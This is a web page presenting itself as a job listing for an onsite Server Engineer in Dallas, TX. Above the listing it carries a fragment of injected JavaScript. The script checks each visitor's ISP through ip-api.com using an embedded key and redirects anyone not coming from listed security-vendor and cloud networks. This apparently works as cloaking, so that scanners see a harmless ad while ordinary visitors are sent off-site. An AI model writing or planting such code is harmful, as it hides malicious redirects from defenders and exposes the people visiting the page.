Server Engineer – Onsite Position
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a skilled Server Engineer for an onsite role in Dallas, TX.
Responsibilities include
- Designing, implementing, and maintaining server infrastructure to ensure optimal performance and security.
- Managing and troubleshooting Windows and Linux server environments.
- Collaborating with IT teams to support network and system integrations.
- Monitoring server health, performing updates, and implementing disaster recovery procedures.
- Automating tasks using scripting and configuration management tools.
- Documenting system configurations and procedures for compliance and knowledge sharing.
Required skills include
- Strong knowledge of server operating systems and virtualization technologies.
- Experience with scripting languages such as PowerShell or Bash.
- Familiarity with network protocols, security practices, and cloud integrations.
- Excellent problem-solving and communication skills.
Benefits include competitive salary, health insurance, paid time off, professional development opportunities, and a collaborative work environment.